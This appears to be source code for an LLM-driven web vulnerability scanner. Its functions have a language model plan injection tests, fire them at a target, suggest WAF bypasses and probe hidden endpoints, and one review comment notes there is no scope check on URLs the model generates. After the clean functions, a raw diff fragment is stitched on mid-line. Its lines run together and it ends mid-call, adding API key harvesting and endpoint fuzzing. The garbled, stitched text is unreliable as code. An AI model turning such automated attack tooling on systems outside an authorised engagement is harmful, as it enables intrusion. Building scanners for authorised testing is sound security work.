# ── AI Deep Test: Iterative Human-Pentester Loop ─────────────────────

# Upper bound on plan → execute → analyze rounds per (url, vuln_type).
MAX_DEEP_TEST_ITERATIONS = 3

async def _ai_deep_test(
    self,
    url: str,
    vuln_type: str,
    params: List[str],
    method: str = "GET",
    form_defaults: Optional[Dict] = None,
) -> Optional["Finding"]:
    """AI-driven iterative testing loop — the core of LLM-as-VulnEngine.

    Each round:
      1. OBSERVES — builds context via ``_build_deep_test_context``
      2. PLANS    — asks the LLM for test cases (JSON with a ``tests`` list)
      3. EXECUTES — sends them via ``_execute_ai_planned_tests``
      4. ANALYZES — asks the LLM to review the captured responses
      5. ADAPTS   — loops again only if the analysis sets ``continue_testing``

    Every candidate is passed through ``_judge_finding()`` before being
    returned.

    Args:
        url: Endpoint under test.
        vuln_type: Vulnerability type key used for prompts and playbook lookup.
        params: Known parameter names; the first one is the fallback
            parameter when a test result does not name one.
        method: Default HTTP method for generated tests.
        form_defaults: Optional form default values included in the context.

    Returns:
        The first finding accepted by ``_judge_finding``, or ``None`` when the
        LLM/session is unavailable, the scan is cancelled, the token budget
        says to skip, or no round yields an accepted finding.
    """
    # Local import: a plain attribute bag is all reject_finding() is given.
    from types import SimpleNamespace

    if not self.llm.is_available() or not self.session:
        return None
    if self.is_cancelled():
        return None

    # Token budget check — skip if budget exhausted
    if self.token_budget and hasattr(self.token_budget, 'should_skip'):
        if self.token_budget.should_skip("deep_test"):
            return None

    await self.log("debug", f" [AI-DEEP] {vuln_type} on {url[:60]}...")

    # Step 1: OBSERVE — Build rich context
    context = self._build_deep_test_context(
        url, vuln_type, params, method, form_defaults
    )

    # Playbook context (best-effort enrichment of the planning prompt)
    playbook_ctx = ""
    if HAS_PLAYBOOK:
        try:
            entry = get_playbook_entry(vuln_type)
            if entry:
                prompts = get_testing_prompts(vuln_type)
                bypass = get_bypass_strategies(vuln_type)
                anti_fp = get_anti_fp_rules(vuln_type)
                sections = [
                    f"\n## PLAYBOOK METHODOLOGY for {vuln_type}\n",
                    f"Overview: {entry.get('overview', '')}\n",
                ]
                if prompts:
                    sections.append("Testing prompts:\n")
                    sections.extend(f" - {p}\n" for p in prompts[:5])
                if bypass:
                    sections.append(
                        f"Bypass strategies: {', '.join(map(str, bypass[:5]))}\n"
                    )
                if anti_fp:
                    sections.append(
                        f"Anti-FP rules: {', '.join(map(str, anti_fp[:3]))}\n"
                    )
                playbook_ctx = "".join(sections)
        except Exception as e:
            # Missing playbook data must not abort the test; just record why.
            await self.log("debug", f" [AI-DEEP] Playbook context unavailable: {e}")

    # Import the prompt builders
    try:
        from backend.core.vuln_engine.ai_prompts import (
            get_deep_test_plan_prompt, get_deep_test_analysis_prompt
        )
    except ImportError:
        return None

    default_param = params[0] if params else ""
    previous_results_json = ""
    all_test_results = []

    for iteration in range(1, self.MAX_DEEP_TEST_ITERATIONS + 1):
        if self.is_cancelled():
            return None

        # Step 2: PLAN — AI generates targeted test cases
        plan_prompt = get_deep_test_plan_prompt(
            vuln_type=vuln_type,
            context=context,
            playbook_ctx=playbook_ctx,
            iteration=iteration,
            previous_results=previous_results_json,
        )

        try:
            plan_response = await self.llm.generate(
                plan_prompt,
                self._get_enhanced_system_prompt("deep_testing", vuln_type)
            )
        except Exception as e:
            await self.log("debug", f" [AI-DEEP] Plan error round {iteration}: {e}")
            break

        # Parse plan JSON (greedy match: first "{" to last "}")
        plan_match = re.search(r'\{[\s\S]*\}', plan_response or "")
        if not plan_match:
            await self.log("debug", f" [AI-DEEP] No JSON in plan response round {iteration}")
            break

        try:
            plan = json.loads(plan_match.group())
        except json.JSONDecodeError:
            await self.log("debug", f" [AI-DEEP] JSON parse error round {iteration}")
            break

        tests = plan.get("tests", [])
        # The LLM may emit a non-list here; treat it the same as "no tests".
        if not isinstance(tests, list) or not tests:
            await self.log("debug", f" [AI-DEEP] No tests generated round {iteration}")
            break

        reasoning = plan.get("reasoning", "")
        if reasoning and iteration == 1:
            await self.log("info", f" [AI-DEEP] Strategy: {str(reasoning)[:120]}")

        # Step 3: EXECUTE — Send requests, capture full responses
        round_results = await self._execute_ai_planned_tests(tests, url, method)
        all_test_results.extend(round_results)

        if not round_results:
            break

        # Build baseline string for analysis
        baseline_str = ""
        baseline_resp = self.memory.get_baseline(url)
        if baseline_resp:
            baseline_body = baseline_resp.get('body') or ''
            baseline_headers = dict(list((baseline_resp.get('headers') or {}).items())[:10])
            baseline_str = (
                f"Status: {baseline_resp.get('status', '?')}\n"
                f"Headers: {json.dumps(baseline_headers, default=str)}\n"
                f"Body preview: {baseline_body[:500]}\n"
                f"Body length: {len(baseline_body)}"
            )

        # Step 4: ANALYZE — AI reviews actual responses
        # Only the first five results, capped at 6000 chars, reach the prompt.
        results_json = json.dumps(round_results[:5], indent=2, default=str)[:6000]

        analysis_prompt = get_deep_test_analysis_prompt(
            vuln_type=vuln_type,
            test_results=results_json,
            baseline=baseline_str,
            iteration=iteration,
        )

        try:
            analysis_response = await self.llm.generate(
                analysis_prompt,
                self._get_enhanced_system_prompt("confirmation", vuln_type)
            )
        except Exception as e:
            await self.log("debug", f" [AI-DEEP] Analysis error round {iteration}: {e}")
            break

        # Parse analysis JSON
        analysis_match = re.search(r'\{[\s\S]*\}', analysis_response or "")
        if not analysis_match:
            break

        try:
            analysis = json.loads(analysis_match.group())
        except json.JSONDecodeError:
            break

        # Step 5: Check for confirmed findings
        candidates = analysis.get("analysis", [])
        if not isinstance(candidates, list):
            candidates = []
        for finding_data in candidates:
            # Skip malformed entries instead of crashing on ``.get``.
            if not isinstance(finding_data, dict):
                continue
            if not finding_data.get("is_vulnerable"):
                continue
            confidence = str(finding_data.get("confidence", "")).lower()
            if confidence not in ("high", "medium"):
                continue

            evidence = str(finding_data.get("evidence") or "")
            test_name = finding_data.get("test_name", "AI Deep Test")

            # Find matching test result for endpoint + response. Current-round
            # results are searched first so a test name reused across rounds
            # is checked against the response the analysis actually saw.
            matched_resp = next(
                (
                    tr for tr in (*round_results, *all_test_results)
                    if test_name in (tr.get("test_name"), tr.get("name"))
                ),
                None,
            )
            affected_endpoint = matched_resp.get("url", url) if matched_resp else url
            matched_body = matched_resp.get("body_preview", "") if matched_resp else ""

            # Anti-hallucination: verify evidence exists in actual response.
            # NOTE(review): when no result matches ``test_name`` (or the body
            # is empty) this check is skipped and only _judge_finding() guards
            # the claim — confirm that is intended.
            if evidence and matched_body:
                if not self._evidence_in_response(evidence, matched_body):
                    await self.log("debug",
                        f" [AI-DEEP] REJECTED: evidence not grounded in response for {test_name}")
                    self.memory.reject_finding(
                        SimpleNamespace(
                            vulnerability_type=vuln_type,
                            affected_endpoint=affected_endpoint,
                            parameter="",
                        ),
                        f"AI evidence not in response: {evidence[:100]}"
                    )
                    continue

            # Extract payload from matching test
            payload = ""
            param_name = ""
            if matched_resp:
                payload = matched_resp.get("payload", "")
                param_name = matched_resp.get("param", default_param)

            # Run through ValidationJudge pipeline
            finding = await self._judge_finding(
                vuln_type, affected_endpoint, param_name or default_param,
                payload, evidence, matched_resp or {},
                baseline=baseline_resp
            )
            if finding:
                await self.log("warning",
                    f" [AI-DEEP] CONFIRMED {vuln_type} round {iteration}: "
                    f"{confidence} confidence")
                return finding

        # Step 6: ADAPT — decide whether to continue
        if not analysis.get("continue_testing", False):
            await self.log("debug",
                f" [AI-DEEP] {vuln_type}: done after round {iteration} "
                f"({analysis.get('summary', 'no findings')})")
            break

        # Prepare previous results for next iteration
        previous_results_json = results_json
        next_strategy = analysis.get("next_round_strategy", "")
        if next_strategy:
            await self.log("debug", f" [AI-DEEP] Round {iteration + 1} strategy: {str(next_strategy)[:80]}")

    return None

def _build_deep_test_context(
    self,
    url: str,
    vuln_type: str,
    params: List[str],
    method: str,
    form_defaults: Optional[Dict] = None,
) -> str:
    """Build the observation context string for the AI deep test loop.

    Combines endpoint details, form defaults, detected technologies, the
    stored baseline response, WAF names and bypass techniques, parameter
    risk ranking, parameters memory reports as already tested, and RAG
    context. Optional sections are omitted when their data is missing.

    Args:
        url: Endpoint under test (query string is stripped for BASE URL).
        vuln_type: Vulnerability type used for memory and RAG lookups.
        params: Parameter names discovered for the endpoint.
        method: HTTP method reported in the context.
        form_defaults: Optional form defaults, JSON-encoded and truncated.

    Returns:
        Newline-joined context text.
    """
    parsed = urlparse(url)
    base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"

    # Endpoint details
    parts = [
        f"TARGET URL: {url}",
        f"BASE URL: {base_url}",
        f"METHOD: {method}",
        f"PARAMETERS: {', '.join(params[:10]) if params else 'none discovered'}",
    ]

    if form_defaults:
        parts.append(f"FORM DEFAULTS: {json.dumps(form_defaults, default=str)[:300]}")

    # Technology stack
    if self.recon.technologies:
        parts.append(f"TECHNOLOGIES: {', '.join(self.recon.technologies[:10])}")

    # Baseline response (exact URL first, then the query-less base URL)
    baseline = self.memory.get_baseline(url) or self.memory.get_baseline(base_url)
    if baseline:
        # A stored body of None is treated like an empty body.
        baseline_body = baseline.get('body') or ''
        parts.append("\nBASELINE RESPONSE:")
        parts.append(f" Status: {baseline.get('status', '?')}")
        parts.append(f" Content-Type: {baseline.get('content_type', '?')}")
        parts.append(f" Body length: {len(baseline_body)}")
        body_preview = baseline_body[:300]
        if body_preview:
            parts.append(f" Body preview: {body_preview}")

    # WAF information
    if self._waf_result and self._waf_result.detected_wafs:
        # Entries may be dicts, objects exposing ``.name`` (as the master-plan
        # and junior-test code assume), or plain strings.
        waf_names = [
            str(w.get('name', '?')) if isinstance(w, dict)
            else str(getattr(w, 'name', w))
            for w in self._waf_result.detected_wafs
        ]
        parts.append(f"\nWAF DETECTED: {', '.join(waf_names)}")
        if self.waf_detector:
            try:
                bypasses = self.waf_detector.get_bypass_techniques(self._waf_result)
                if bypasses:
                    parts.append(f"WAF BYPASS TECHNIQUES: {', '.join(bypasses[:5])}")
            except Exception:
                # Best-effort: bypass hints are optional prompt enrichment.
                pass

    # Parameter analysis
    if self.param_analyzer and params:
        try:
            param_dict = {p: "" for p in params[:5]}
            ranked = self.param_analyzer.rank_parameters(param_dict)
            param_info = [
                f" {name}: risk={score:.1f}, likely_vulns={vulns[:3]}"
                for name, score, vulns in ranked[:5]
            ]
            if param_info:
                parts.append("\nPARAMETER RISK ANALYSIS:")
                parts.extend(param_info)
        except Exception:
            # Best-effort: ranking failures leave the section out.
            pass

    # Memory: what was already tested
    already_tested = [
        f" {p}: already tested (skip)"
        for p in params[:3]
        if self.memory.was_tested(url, p, vuln_type)
        or self.memory.was_tested(base_url, p, vuln_type)
    ]
    if already_tested:
        parts.append("\nPREVIOUSLY TESTED (from memory):")
        parts.extend(already_tested)

    # RAG context
    if self.rag_engine:
        try:
            rag_ctx = self._get_rag_testing_context(vuln_type, url)
            if rag_ctx:
                parts.append("\nRAG CONTEXT (historical patterns):")
                parts.append(rag_ctx[:500])
        except Exception:
            # Best-effort: RAG lookup is optional.
            pass

    return "\n".join(parts)

async def _execute_ai_planned_tests(
    self, tests: List[Dict], default_url: str, default_method: str
) -> List[Dict]:
    """Execute AI-planned test cases and return one result dict per test.

    At most the first five entries are considered; entries that are not
    dicts are skipped. Relative URLs are resolved against ``default_url``.
    Requests go through ``_make_request()`` or
    ``_make_request_with_injection()``.

    Args:
        tests: Test case dicts from the LLM plan (``url``, ``method``,
            ``params``, ``headers``, ``body``, ``name``, ``injection_point``).
        default_url: URL used when a test omits ``url``.
        default_method: HTTP method used when a test omits ``method``.

    Returns:
        Result dicts with ``test_name``/``name``, ``url``, ``method``,
        ``status``, ``body_preview``, ``body_length``, ``payload`` and
        ``param``; successful ones add ``headers`` and ``response_time``,
        failed ones add ``error``.
    """
    results = []
    now = asyncio.get_running_loop().time

    for test in tests[:5]:
        if self.is_cancelled():
            break
        # LLM output is untrusted: ignore entries that are not objects.
        if not isinstance(test, dict):
            continue

        # NOTE(review): the URL comes from the LLM and is not checked against
        # the engagement scope here — confirm a scope guard exists downstream.
        test_url = urljoin(default_url, str(test.get("url") or default_url))
        test_method = str(test.get("method") or default_method).upper()
        test_params = test.get("params")
        if not isinstance(test_params, dict):
            test_params = {}
        test_headers = test.get("headers")
        if not isinstance(test_headers, dict):
            test_headers = {}
        test_body = test.get("body", "")
        test_name = test.get("name") or "unnamed"
        injection_point = test.get("injection_point", "parameter")

        # What was actually injected, recorded for finding creation.
        payload_used = ""
        param_used = ""

        try:
            start_time = now()

            if injection_point == "header" and test_headers:
                # Use header injection for header-based tests
                header_name = next(iter(test_headers))
                payload = test_headers.get(header_name, "")
                payload_used, param_used = str(payload), header_name
                resp = await self._make_request_with_injection(
                    test_url, test_method, payload,
                    injection_point="header", header_name=header_name
                )
            elif injection_point == "body" and test_body:
                # Body injection (always sent as POST)
                payload_used, param_used = str(test_body), "data"
                resp = await self._make_request_with_injection(
                    test_url, "POST", test_body,
                    injection_point="body", param_name="data"
                )
            elif test_params:
                # Parameter injection (default): the first value longer than
                # three characters is treated as the payload.
                for k, v in test_params.items():
                    if v and len(str(v)) > 3:
                        payload_used, param_used = str(v), k
                        break
                resp = await self._make_request(test_url, test_method, test_params)
            else:
                # Plain request
                resp = await self._make_request(test_url, test_method, {})

            elapsed = now() - start_time

            if resp:
                resp_body = resp.get("body") or ""
                resp_headers = resp.get("headers") or {}
                results.append({
                    "test_name": test_name,
                    "name": test_name,
                    "url": test_url,
                    "method": test_method,
                    "status": resp.get("status", 0),
                    "headers": dict(list(resp_headers.items())[:15]),
                    "body_preview": resp_body[:1500],
                    "body_length": len(resp_body),
                    "response_time": round(elapsed, 3),
                    "payload": payload_used,
                    "param": param_used,
                })
            else:
                results.append({
                    "test_name": test_name,
                    "name": test_name,
                    "url": test_url,
                    "method": test_method,
                    "status": 0,
                    "error": "No response",
                    "body_preview": "",
                    "body_length": 0,
                    "payload": payload_used,
                    "param": param_used,
                })

        except Exception as e:
            results.append({
                "test_name": test_name,
                "name": test_name,
                "url": test_url,
                "method": test_method,
                "error": str(e),
                "status": 0,
                "body_preview": "",
                "body_length": 0,
                "payload": payload_used,
                "param": param_used,
            })

    return results

# ── Pre-Stream AI Master Plan ──

async def _ai_master_plan(self) -> Dict:
    """Generate a strategic master plan before launching parallel streams.

    Probes ``self.target`` once, summarizes whatever recon data already
    exists (technologies, endpoints, forms, WAF, playbook categories) and
    asks the LLM for a JSON plan.

    Returns:
        The parsed plan dict, or ``{}`` when the LLM is unavailable, the
        prompt builder cannot be imported, or the response cannot be parsed.
    """
    if not self.llm.is_available():
        return {}

    try:
        from backend.core.vuln_engine.ai_prompts import get_master_plan_prompt
    except ImportError:
        return {}

    # Gather initial context from whatever recon we have so far
    initial_response = ""
    try:
        resp = await self._make_request(self.target)
        if resp:
            status = resp.get("status", 0)
            headers = resp.get("headers") or {}
            body = resp.get("body") or ""
            server = headers.get("server", headers.get("Server", ""))
            powered = headers.get("x-powered-by", headers.get("X-Powered-By", ""))
            content_type = headers.get("content-type", headers.get("Content-Type", ""))
            initial_response = (
                f"Status: {status}\n"
                f"Server: {server}\n"
                f"X-Powered-By: {powered}\n"
                f"Content-Type: {content_type}\n"
                f"Response size: {len(body)} bytes\n"
                f"Key headers: {json.dumps(dict(list(headers.items())[:10]), default=str)}\n"
                f"Body preview: {body[:500]}"
            )
    except Exception as e:
        # The plan can still be built without the probe; record why it is missing.
        await self.log("debug", f" [MASTER PLAN] Initial probe failed: {e}")

    tech_str = ", ".join(self.recon.technologies[:15]) if self.recon.technologies else ""
    endpoints_str = "\n".join(
        f" - {ep.get('url', ep) if isinstance(ep, dict) else ep}"
        for ep in self.recon.endpoints[:20]
    ) if self.recon.endpoints else ""
    forms_str = "\n".join(
        f" - {f.get('action', '?')} [{f.get('method', 'GET')}] "
        f"params: {', '.join(map(str, f.get('inputs') or []))}"
        for f in self.recon.forms[:10]
    ) if self.recon.forms else ""

    # WAF entries may be dicts or objects; a missing or non-numeric
    # confidence is simply omitted instead of failing the whole plan.
    waf_info = ""
    waf_result = getattr(self, '_waf_result', None)
    if waf_result and waf_result.detected_wafs:
        waf_labels = []
        for w in waf_result.detected_wafs:
            if isinstance(w, dict):
                w_name, w_conf = w.get("name", "?"), w.get("confidence")
            else:
                w_name, w_conf = getattr(w, "name", str(w)), getattr(w, "confidence", None)
            if isinstance(w_conf, (int, float)):
                waf_labels.append(f"{w_name} ({w_conf:.0%})")
            else:
                waf_labels.append(str(w_name))
        waf_info = ", ".join(waf_labels)

    # Playbook context
    playbook_ctx = ""
    if HAS_PLAYBOOK:
        try:
            summary = get_playbook_summary()
            playbook_ctx = "\n## PLAYBOOK CATEGORIES\n" + "\n".join(
                f"- {cat}: {', '.join(vts[:5])}" for cat, vts in summary.items()
            )
        except Exception:
            # Best-effort: playbook categories are optional prompt enrichment.
            pass

    prompt = get_master_plan_prompt(
        target=self.target,
        initial_response=initial_response,
        technologies=tech_str,
        endpoints_preview=endpoints_str,
        forms_preview=forms_str,
        waf_info=waf_info,
        playbook_context=playbook_ctx,
    )

    try:
        resp_text = await self.llm.generate(
            prompt,
            system=self._get_enhanced_system_prompt("strategy")
        )
        # Take the outermost {...} span; index/rindex raise if none exists.
        start = resp_text.index('{')
        end = resp_text.rindex('}') + 1
        return json.loads(resp_text[start:end])
    except Exception as e:
        await self.log("debug", f" [MASTER PLAN] Parse error: {e}")
        return {}
"GET"}) await self._endpoint_queue.put({"url": rurl}) + if robots_paths: + await self.log("info", f" [DEEP RECON] Robots.txt: {len(robots_paths)} paths") - # API enumeration (Swagger/OpenAPI discovery) + # API enumeration (Swagger/OpenAPI/GraphQL discovery) api_schema = await self.deep_recon.enumerate_api( self.target, self.recon.technologies ) if api_schema: for ep_info in getattr(api_schema, "endpoints", []): - if isinstance(ep_info, dict) and ep_info.get("path"): - full_url = urljoin(self.target, ep_info["path"]) - self.recon.api_endpoints.append(full_url) - await self._endpoint_queue.put({"url": full_url}) + if isinstance(ep_info, dict): + ep_path = ep_info.get("url") or ep_info.get("path", "") + if ep_path: + full_url = urljoin(self.target, ep_path) + self.recon.api_endpoints.append(full_url) + ep_method = ep_info.get("method", "GET") + ep_params = ep_info.get("params", []) + self.recon.endpoints.append({ + "url": full_url, "method": ep_method, "params": ep_params + }) + await self._endpoint_queue.put({ + "url": full_url, "method": ep_method, "params": ep_params + }) + if api_schema.endpoints: + await self.log("info", f" [DEEP RECON] API schema ({api_schema.source}): " + f"{len(api_schema.endpoints)} endpoints") - # JS file analysis + # JS file analysis (enhanced: source maps, parameters, more patterns) if self.recon.js_files: js_result = await self.deep_recon.crawl_js_files( - self.target, self.recon.js_files[:20] + self.target, self.recon.js_files[:30] ) if js_result: for js_ep in getattr(js_result, "endpoints", []): @@ -4688,10 +5240,63 @@ NOT_VULNERABLE: """ full_url = urljoin(self.target, js_ep) self.recon.endpoints.append({"url": full_url}) await self._endpoint_queue.put({"url": full_url}) + # Log source map routes + if js_result.source_map_routes: + await self.log("info", f" [DEEP RECON] Source maps: " + f"{len(js_result.source_map_routes)} routes from .map files") + # Store discovered JS parameters + if js_result.parameters: + for param_ep, params in 
js_result.parameters.items(): + for p in params: + if p not in self.recon.parameters: + self.recon.parameters[p] = None + if js_result.endpoints: + await self.log("info", f" [DEEP RECON] JS analysis: " + f"{len(js_result.endpoints)} endpoints, " + f"{len(js_result.api_keys)} keys, " + f"{len(js_result.internal_urls)} internal URLs") + # Store discovered secrets/keys for reporting + if js_result.api_keys: + for key in js_result.api_keys: + await self.log("info", f" [DEEP RECON] Found API key: {key[:8]}...{key[-4:]}") + + # Framework-specific endpoint discovery + try: + from backend.core.deep_recon import EndpointInfo + fw_endpoints = await self.deep_recon.discover_framework_endpoints( + self.target, self.recon.technologies + ) + for fw_ep in (fw_endpoints or []): + if isinstance(fw_ep, EndpointInfo): + self.recon.endpoints.append({"url": fw_ep.url, "method": fw_ep.method}) + await self._endpoint_queue.put({ + "url": fw_ep.url, "method": fw_ep.method, + "source": fw_ep.source, "ai_priority": fw_ep.priority >= 7, + }) + if fw_endpoints: + await self.log("info", f" [DEEP RECON] Framework discovery: " + f"{len(fw_endpoints)} live endpoints") + except Exception as e: + await self.log("debug", f" [DEEP RECON] Framework discovery error: {e}") + + # API pattern fuzzing (infer endpoints from known patterns) + try: + known_urls = [ep["url"] if isinstance(ep, dict) else str(ep) + for ep in self.recon.endpoints if ep] + fuzzed = await self.deep_recon.fuzz_api_patterns(self.target, known_urls) + for fz_ep in (fuzzed or []): + if isinstance(fz_ep, EndpointInfo): + self.recon.endpoints.append({"url": fz_ep.url, "method": fz_ep.method}) + await self._endpoint_queue.put({"url": fz_ep.url}) + if fuzzed: + await self.log("info", f" [DEEP RECON] API fuzzing: " + f"{len(fuzzed)} inferred endpoints alive") + except Exception as e: + await self.log("debug", f" [DEEP RECON] API fuzzing error: {e}") new_eps = len(self.recon.endpoints) - prev_ep_count if new_eps > 0: - await self.log("info", 
f" [DEEP RECON] Discovered {new_eps} additional endpoints") + await self.log("info", f" [DEEP RECON] Total: {new_eps} new endpoints discovered") except Exception as e: await self.log("debug", f" [DEEP RECON] Error: {e}") @@ -4763,6 +5368,56 @@ NOT_VULNERABLE: """ except Exception as e: await self.log("debug", f" [SITE ANALYZER] Error: {e}") + # ── Phase 9: AI Endpoint Analysis ── + # After all recon, ask AI to analyze the full attack surface + if self.llm.is_available() and self.recon.endpoints and not self.is_cancelled(): + try: + await self.log("info", " [STREAM 1] AI analyzing attack surface...") + recon_analysis = await self._ai_analyze_recon() + if recon_analysis: + # Feed high-priority endpoints back into queue for junior testing + for hp in recon_analysis.get("high_priority_endpoints", [])[:10]: + hp_url = hp.get("url", "") + if hp_url and hp_url.startswith("http"): + await self._endpoint_queue.put({ + "url": hp_url, + "ai_priority": True, + "suggested_vulns": hp.get("suggested_vuln_types", []), + }) + # Probe hidden endpoints the AI suggests + for hidden in recon_analysis.get("hidden_endpoints_to_probe", [])[:5]: + hurl = hidden.get("url", "") + if hurl: + if not hurl.startswith("http"): + hurl = urljoin(self.target, hurl) + try: + probe_resp = await self._make_request(hurl) + if probe_resp and probe_resp.get("status", 0) not in (0, 404): + self.recon.endpoints.append({"url": hurl, "method": "GET"}) + await self._endpoint_queue.put({"url": hurl}) + await self.log("info", f" [AI RECON] Hidden endpoint found: {hurl} " + f"(status {probe_resp.get('status', '?')})") + except Exception: + pass + # Store tech-vuln mappings for later deep testing + tech_vulns = recon_analysis.get("tech_vuln_mapping", []) + if tech_vulns: + tech_recommended = [] + for tv in tech_vulns: + tech_recommended.extend(tv.get("vuln_types", [])) + if tech_recommended: + self._playbook_recommended_types = list(dict.fromkeys( + tech_recommended + self._playbook_recommended_types + )) + # Log 
async def _ai_analyze_recon(self) -> Dict:
    """AI analysis of reconnaissance results for Stream 1.

    Summarizes the discovered endpoints, forms, technologies, parameters,
    JS files and API endpoints into a prompt and asks the LLM for a JSON
    analysis.

    Returns:
        The parsed analysis dict, or ``{}`` when the prompt builder cannot
        be imported or the LLM response cannot be parsed.
    """
    try:
        from backend.core.vuln_engine.ai_prompts import get_recon_analysis_prompt
    except ImportError:
        return {}

    # Endpoints are stored both as dicts and as plain URL strings; only
    # dicts carry a method, so strings are listed as GET.
    endpoint_lines = []
    for ep in self.recon.endpoints[:30]:
        if isinstance(ep, dict):
            endpoint_lines.append(f" - [{ep.get('method', 'GET')}] {ep.get('url', ep)}")
        else:
            endpoint_lines.append(f" - [GET] {ep}")
    endpoints_str = "\n".join(endpoint_lines)

    forms_str = "\n".join(
        f" - {f.get('action', '?')} [{f.get('method', 'GET')}] "
        f"inputs: {', '.join(map(str, f.get('inputs') or []))}"
        for f in self.recon.forms[:15]
    )
    tech_str = ", ".join(self.recon.technologies[:20])
    params_str = "\n".join(
        f" - {url}: {', '.join(map(str, p)) if isinstance(p, list) else str(p)}"
        for url, p in list(self.recon.parameters.items())[:15]
    )
    js_str = "\n".join(f" - {js}" for js in self.recon.js_files[:10])
    api_str = "\n".join(f" - {api}" for api in self.recon.api_endpoints[:15])

    prompt = get_recon_analysis_prompt(
        target=self.target,
        endpoints=endpoints_str,
        forms=forms_str,
        technologies=tech_str,
        parameters=params_str,
        js_files=js_str,
        api_endpoints=api_str,
    )

    try:
        resp_text = await self.llm.generate(
            prompt,
            system=self._get_enhanced_system_prompt("strategy")
        )
        # Take the outermost {...} span; index/rindex raise if none exists.
        start = resp_text.index('{')
        end = resp_text.rindex('}') + 1
        return json.loads(resp_text[start:end])
    except Exception as e:
        await self.log("debug", f" [AI RECON] Parse error: {e}")
        return {}
AI-POWERED PAYLOAD GENERATION ── + # Ask AI to generate context-aware payloads instead of using hardcoded ones + ai_tests = [] + if self.llm.is_available(): + try: + from backend.core.vuln_engine.ai_prompts import get_junior_ai_test_prompt + + tech_ctx = ", ".join(self.recon.technologies[:10]) + waf_info = "" + if hasattr(self, '_waf_result') and self._waf_result and self._waf_result.detected_wafs: + waf_info = ", ".join(w.name for w in self._waf_result.detected_wafs) + + # Distill master plan context for this vuln type + master_ctx = "" + if hasattr(self, '_master_plan') and self._master_plan: + strategy = self._master_plan.get("testing_strategy", {}) + if vuln_type in self._master_plan.get("priority_vuln_types", []): + master_ctx = f"This vuln type is PRIORITY per master plan." + bypass = strategy.get("bypass_strategies", []) + if bypass: + master_ctx += f" Bypass strategies: {'; '.join(bypass[:2])}" + + prompt = get_junior_ai_test_prompt( + url=url, vuln_type=vuln_type, params=params, + method=method, tech_context=tech_ctx, + master_plan_context=master_ctx, waf_info=waf_info, + ) + ai_resp = await self.llm.generate( + prompt, + system=self._get_enhanced_system_prompt("testing", vuln_type) + ) + start_idx = ai_resp.index('{') + end_idx = ai_resp.rindex('}') + 1 + ai_data = json.loads(ai_resp[start_idx:end_idx]) + ai_tests = ai_data.get("tests", [])[:5] + except Exception: + pass # Fall back to hardcoded payloads + + # Execute AI-generated tests + if ai_tests: + for test in ai_tests: if self.is_cancelled(): return - header_name = "" - if inj_point == "header": - headers_list = injection_config.get("headers", ["X-Forwarded-For"]) - header_name = headers_list[0] if headers_list else "X-Forwarded-For" + t_param = test.get("param", params[0] if params else "id") + t_payload = test.get("payload", "") + t_method = test.get("method", method) + t_inj = test.get("injection_point", inj_point) + t_header = test.get("header_name", "") + if not t_payload: + continue + if 
self.memory.was_tested(url, t_param, vuln_type): + continue test_resp = await self._make_request_with_injection( - url, method, payload, - injection_point=inj_point, - param_name=param, - header_name=header_name, + url, t_method, t_payload, + injection_point=t_inj, + param_name=t_param, + header_name=t_header, ) if not test_resp: continue is_vuln, evidence = await self._verify_vulnerability( - vuln_type, payload, test_resp + vuln_type, t_payload, test_resp ) if is_vuln: - # Run through ValidationJudge pipeline finding = await self._judge_finding( - vuln_type, url, param, payload, evidence, test_resp, - injection_point=inj_point + vuln_type, url, t_param, t_payload, evidence, test_resp, + injection_point=t_inj ) if finding: await self._add_finding(finding) self._stream_findings_count += 1 - return # One finding per type per URL is enough for junior + return - self.memory.record_test(url, param, vuln_type, [payload], False) + self.memory.record_test(url, t_param, vuln_type, [t_payload], False) + else: + # ── FALLBACK: Hardcoded payloads when AI is unavailable ── + payloads = self._get_payloads(vuln_type)[:3] + if not payloads: + return + + for param in params[:2]: + if self.is_cancelled(): + return + if self.memory.was_tested(url, param, vuln_type): + continue + for payload in payloads: + if self.is_cancelled(): + return + header_name = "" + if inj_point == "header": + headers_list = injection_config.get("headers", ["X-Forwarded-For"]) + header_name = headers_list[0] if headers_list else "X-Forwarded-For" + + test_resp = await self._make_request_with_injection( + url, method, payload, + injection_point=inj_point, + param_name=param, + header_name=header_name, + ) + if not test_resp: + continue + + is_vuln, evidence = await self._verify_vulnerability( + vuln_type, payload, test_resp + ) + if is_vuln: + finding = await self._judge_finding( + vuln_type, url, param, payload, evidence, test_resp, + injection_point=inj_point + ) + if finding: + await 
self._add_finding(finding) + self._stream_findings_count += 1 + return + + self.memory.record_test(url, param, vuln_type, [payload], False) # ── Stream 3: Dynamic Tool Runner ── @@ -5150,12 +5946,89 @@ Respond ONLY with a JSON array: await self.log("info", f" [TOOL] {tool_name}: completed " f"({result.duration_seconds:.1f}s, no findings)") + # ── AI ANALYSIS of tool output ── + # Ask AI to analyze raw tool output for hidden insights + tool_output = (result.stdout or "") + "\n" + (result.stderr or "") + if self.llm.is_available() and tool_output.strip(): + try: + ai_analysis = await self._ai_analyze_tool_output( + tool_name, tool_output + ) + if ai_analysis: + # Process AI-identified real findings + for af in ai_analysis.get("real_findings", [])[:5]: + if af.get("confidence") in ("high", "medium"): + vtype = af.get("vulnerability_type", "vulnerability") + endpoint = af.get("endpoint", self.target) + if not self.memory.has_finding_for(vtype, endpoint, ""): + ai_tool_finding = { + "title": af.get("title", f"AI-{tool_name} finding"), + "severity": af.get("severity", "medium"), + "vulnerability_type": vtype, + "affected_endpoint": endpoint, + "evidence": af.get("evidence", ""), + } + await self._process_tool_finding(ai_tool_finding, tool_name) + + # Queue follow-up tests for junior stream + for ft in ai_analysis.get("follow_up_tests", [])[:3]: + ft_url = ft.get("endpoint", "") + if ft_url and ft_url.startswith("http") and hasattr(self, '_endpoint_queue'): + await self._endpoint_queue.put({ + "url": ft_url, + "ai_priority": True, + "suggested_vulns": [ft.get("vuln_type", "")], + }) + + insights = ai_analysis.get("target_insights", "") + if insights: + await self.log("info", f" [AI TOOL] {tool_name} insights: {insights[:120]}") + except Exception as e: + await self.log("debug", f" [AI TOOL] Analysis error for {tool_name}: {e}") + # Feed tool output back into recon context self._ingest_tool_results(tool_name, result) except Exception as e: await self.log("warning", f" 
